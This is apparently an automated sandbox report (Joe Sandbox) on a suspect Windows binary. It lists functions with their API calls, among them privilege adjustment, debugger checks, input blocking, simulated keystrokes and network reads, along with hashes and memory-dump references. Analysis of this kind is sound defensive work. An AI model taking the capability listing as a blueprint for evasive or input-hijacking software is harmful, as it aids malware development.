LoadResource.KERNEL32(?,00000000,?,?,009556C2,?,?,00000000,00000000,?,?,?,?,?,?,009166CE), ref: 00983A45
SizeofResource.KERNEL32(?,00000000,?,?,009556C2,?,?,00000000,00000000,?,?,?,?,?,?,009166CE), ref: 00983A56
LockResource.KERNEL32(009556C2,?,?,009556C2,?,?,00000000,00000000,?,?,?,?,?,?,009166CE,?), ref: 00983A65

Strings

SCRIPT, xrefs: 00983A2B

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 7003e14230450ee064c8da356fbccce8fbf0ab810dba9be6e60170709ddb2b05
Instruction ID: 0284bb109dd3c714512790f3d2754e4123405556747874809dba60fe15322b44
Opcode Fuzzy Hash: 7003e14230450ee064c8da356fbccce8fbf0ab810dba9be6e60170709ddb2b05
Instruction Fuzzy Hash: 92117970201701BFE7259F65DC48F277BBDEFC6B50F14826CB812966A0DBB1E900DA60

Function 009720AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00971900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00971916
Part of subcall function 00971900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00971922
Part of subcall function 00971900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00971931
Part of subcall function 00971900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00971938
Part of subcall function 00971900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0097194E

GetLengthSid.ADVAPI32(?,00000000,00971C81), ref: 009720FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00972107
HeapAlloc.KERNEL32(00000000), ref: 0097210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00972127
GetProcessHeap.KERNEL32(00000000,00000000,00971C81), ref: 0097213B
HeapFree.KERNEL32(00000000), ref: 00972142

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: c17700576a2cb71e013ac864c0bf1823406bea486fb72ca7203d4fdb66500acc
Instruction ID: 01a8c57a207151b8e79009fd5a9ef205e72d99b47661125e37e5d10e611affe3
Opcode Fuzzy Hash: c17700576a2cb71e013ac864c0bf1823406bea486fb72ca7203d4fdb66500acc
Instruction Fuzzy Hash: 1D110072629205FFDB149F64CC08BAE7BBDFF42355F208018E94A97120C3359900DBA0

Function 0098A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0098A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0098A6D0

Part of subcall function 009842B9: GetInputState.USER32 ref: 00984310
Part of subcall function 009842B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009843AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0098A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0098A6BA

Strings

*.*, xrefs: 0098A5A2

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 8e5912be0cc657a6f0e6152a8eca4260a445a18c094aff65d2dfd8611176bf75
Instruction ID: 32fc5c07e3c4f546c3bc2b2b021109a34a7125128361a9a9651b98af3ac465a3
Opcode Fuzzy Hash: 8e5912be0cc657a6f0e6152a8eca4260a445a18c094aff65d2dfd8611176bf75
Instruction Fuzzy Hash: 1941717190520EAFDF14EFA4C849BEEBBB8FF45314F144056E815A2291EB359E84CFA1

Function 009122AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 0091233E
GetSysColor.USER32(0000000F), ref: 00912421
SetBkColor.GDI32(?,00000000), ref: 00912434

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 7fd162d18e950ab78f9d4d6c6f4a3fea74ec64bec32e8da6168fb4bbd90ee28a
Instruction ID: 583b9a9fc78ca4b3507fd3ffe189c49da22a15fa566c6866ae2b1194c1db998a
Opcode Fuzzy Hash: 7fd162d18e950ab78f9d4d6c6f4a3fea74ec64bec32e8da6168fb4bbd90ee28a
Instruction Fuzzy Hash: 3A8136B070810CBEE62DB73A4C88EFF265EEB86741B104909F512C6595C95D8F939376

Function 00992263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00993AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00993AD7
Part of subcall function 00993AAB: _wcslen.LIBCMT ref: 00993AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009922BA
WSAGetLastError.WSOCK32 ref: 009922E1
bind.WSOCK32(00000000,?,00000010), ref: 00992338
WSAGetLastError.WSOCK32 ref: 00992343
closesocket.WSOCK32(00000000), ref: 00992372

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: d00f8c003c13052b32a7e908fb35e0fd7934b8549bea29c62bfe2fff9017d232
Instruction ID: 78f718e43d4e41d902758f52def615d0599078676b2bfd4cfa509a60eeea85d9
Opcode Fuzzy Hash: d00f8c003c13052b32a7e908fb35e0fd7934b8549bea29c62bfe2fff9017d232
Instruction Fuzzy Hash: E151D375B00214AFDB10EF28C886F6A77E9AF85754F448048F9565F2D3C774AD418BE1

Function 009A26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 009A275C
IsWindowEnabled.USER32 ref: 009A276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 009A2777
IsIconic.USER32 ref: 009A2785
IsZoomed.USER32 ref: 009A2793

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 4863a07be59df51c6c9e946af48ef758061ee0a7260a04493ee932692a32488e
Instruction ID: 3c2332854594faf36d0aeece2f93aad0012d76ffa137b6758ed7ebee41bf99e4
Opcode Fuzzy Hash: 4863a07be59df51c6c9e946af48ef758061ee0a7260a04493ee932692a32488e
Instruction Fuzzy Hash: 9421F1317052108FE7109F2AC844B5A7BE9EF86324F598068E84A8B251CB71FE42CBD0

Function 0098D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0098D8CE
GetLastError.KERNEL32(?,00000000), ref: 0098D92F
SetEvent.KERNEL32(?,?,00000000), ref: 0098D943

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 3f2e8321a72adcfc8d49f117c84fb63a91fa71958790da8073b2a869c209450e
Instruction ID: 292473718118c70e411c4611691fde58226502ded649d0e79cb5c8428635a7e8
Opcode Fuzzy Hash: 3f2e8321a72adcfc8d49f117c84fb63a91fa71958790da8073b2a869c209450e
Instruction Fuzzy Hash: FA21B371506705EFE720AF65D884BABB7FCEF81314F10441EE556A2281E775EE04DB90

Function 0097E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,009546AC), ref: 0097E482
GetFileAttributesW.KERNEL32(?), ref: 0097E491
FindFirstFileW.KERNEL32(?,?), ref: 0097E4A2
FindClose.KERNEL32(00000000), ref: 0097E4AE

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 6e0baf1519ed2035bcc2c22859a0bb31d3833194b8de24658337a8caf3d5a025
Instruction ID: 1a3231e9e2be47eb02869d3d60e7b388fe440edb5750bf7aaf88f529bcbc028e
Opcode Fuzzy Hash: 6e0baf1519ed2035bcc2c22859a0bb31d3833194b8de24658337a8caf3d5a025
Instruction Fuzzy Hash: 35F0E53242991057D211673CAC0D8AB776DAE07335B508781FC3BC24F0E7789D95A6D5

Function 0096E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0096E5F8

Strings

%.3d, xrefs: 0096E603
X64, xrefs: 0096E680

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 140a20d4812d8c54b8b82bfc66851cb2ca6ee99d317bac85c5af72bfdb5b8346
Instruction ID: f6c51d36e36b01b47c06d10034d2288ffa7061ef46644990abe7a8a68b758028
Opcode Fuzzy Hash: 140a20d4812d8c54b8b82bfc66851cb2ca6ee99d317bac85c5af72bfdb5b8346
Instruction Fuzzy Hash: 93D012B5C09118E6CB809790DD88DBA737CAB19300F208C62F90691000E6289904AB22

Function 00942992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00942A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00942A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00942AA1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2828992ba49713393ca62304de54fedfbed6e572e8f54d2f0ade803e0fe1c139
Instruction ID: ec9f6c2c5f4bdb753825533b930cd3ed4800c0d012c289cc7725aa5bd95a23f3
Opcode Fuzzy Hash: 2828992ba49713393ca62304de54fedfbed6e572e8f54d2f0ade803e0fe1c139
Instruction Fuzzy Hash: 6D31D5749012289BCB21DF68D989BDCBBB8BF48310F5041DAE81CA62A0E7309F85CF45

Function 00972010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0093014B: __CxxThrowException@8.LIBVCRUNTIME ref: 009309D8
Part of subcall function 0093014B: __CxxThrowException@8.LIBVCRUNTIME ref: 009309F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0097205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00972087
GetLastError.KERNEL32 ref: 00972097

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: ce7b21b06f8246c4b5c01d2c4b49fc2f90852e79bea305e2a0bdbe8700779ba8
Instruction ID: 2e32cc976b75636497a4052fe9909f768db1d58962a0e9658d3a518dcb1c7afd
Opcode Fuzzy Hash: ce7b21b06f8246c4b5c01d2c4b49fc2f90852e79bea305e2a0bdbe8700779ba8
Instruction Fuzzy Hash: E511BFB2424205AFD7189F64DC86E6BB7BCEF85710F20C41EE04A53251DB70BC41CA64

Function 00935058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0093502E,?,009D98D8,0000000C,00935185,?,00000002,00000000), ref: 00935079
TerminateProcess.KERNEL32(00000000,?,0093502E,?,009D98D8,0000000C,00935185,?,00000002,00000000), ref: 00935080
ExitProcess.KERNEL32 ref: 00935092

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 41d9f1ac72c7845bec35f3a6fc76d3e0dba2b0e0f4dbd10ec435274844b0d4f2
Instruction ID: 69f6cca2ca685c04b6650698fcc98eafad7bfd5d00b4ddee021e61ba04eeb2d5
Opcode Fuzzy Hash: 41d9f1ac72c7845bec35f3a6fc76d3e0dba2b0e0f4dbd10ec435274844b0d4f2
Instruction Fuzzy Hash: 9EE0B631016548EFCF256F64DD09E583B69EF55385F124014F84A9A521DB36DD42DFC0

Function 0096E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0096E664

Strings

X64, xrefs: 0096E680

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 76e6e96a2e0f864264c73208fb1ff10d6262439f7396d8464b8b2bcf510e6aba
Instruction ID: 5adf4e172c3a8327f4bf23a92eca25404975a1b462a7a34c91a4b9afbbf3754f
Opcode Fuzzy Hash: 76e6e96a2e0f864264c73208fb1ff10d6262439f7396d8464b8b2bcf510e6aba
Instruction Fuzzy Hash: E7D0C9B481612DEACB80DB50ECC8DDA737CBB05304F100A51F106A2000D73495489B20

Function 009841FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,009952EE,?,?,00000035,?), ref: 00984229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,009952EE,?,?,00000035,?), ref: 00984239

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 154b810c0d85809c8b4b9fe67d8e0513bf0e72bfae7bbbf2319bed2acc3b4e13
Instruction ID: 8a7f992beaf7ebd56a065e5f7ca7e1749eb9fa950d3bf06165e9e216db10385f
Opcode Fuzzy Hash: 154b810c0d85809c8b4b9fe67d8e0513bf0e72bfae7bbbf2319bed2acc3b4e13
Instruction Fuzzy Hash: EBF0E5307053296AEB2067669C4DFEF366EEFC6771F000179F515D2291D9709A40C7B1

Function 0097BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0097BC24
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0097BC37

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 2c84d06429c3491c7b513e2ecf2a64593a9a2f8a971ae0a154bc604448b2a537
Instruction ID: 997c716c599db7400002eb022cb134e51ad157a7b83d47765000f34bae699965
Opcode Fuzzy Hash: 2c84d06429c3491c7b513e2ecf2a64593a9a2f8a971ae0a154bc604448b2a537
Instruction Fuzzy Hash: EAF0677180424EABDB059FA4C806BFEBBB4FF08309F04C40AF956AA192C3798601DF94

Function 00971A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00971B48), ref: 00971A20
CloseHandle.KERNEL32(?,?,00971B48), ref: 00971A35

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 4c0a764040c1e3b764aa03d2ee7451b8b447cc39907b35e3ebef50c8c517f2fe
Instruction ID: 5853429cdb1fbeac982455b0953fda47058cd52e8c0d8e1c59d90a0a5b452ded
Opcode Fuzzy Hash: 4c0a764040c1e3b764aa03d2ee7451b8b447cc39907b35e3ebef50c8c517f2fe
Instruction Fuzzy Hash: 81E0BF72019610AFE7252B54FC06F7777A9EF44311F14891DF59681870DB626C91EF50

Function 0098F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0098F51A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: eac930ab242ed4b13d82da62f1d70e64781cabc52c5d2d1239dec8dbc30b99ec
Instruction ID: a7bd929ea401d0f22e8a945f43f124783f6d3fe671904ab87d8aab5297d80828
Opcode Fuzzy Hash: eac930ab242ed4b13d82da62f1d70e64781cabc52c5d2d1239dec8dbc30b99ec
Instruction Fuzzy Hash: 3CE04F323102089FC710AF69D804A9AF7ECAFE47A1F048426FC4AD7351DA70F9808BA1

Function 0097EC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0097ECC7

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 02eb9acf522bdd84cb65fc7f5d5c72d1e9817b9b517aca941be2b35fcf5c2149
Instruction ID: ab93e87ea98b2365e73120fa32240a25cc7dedf761f72c2a9cc4240719f70114
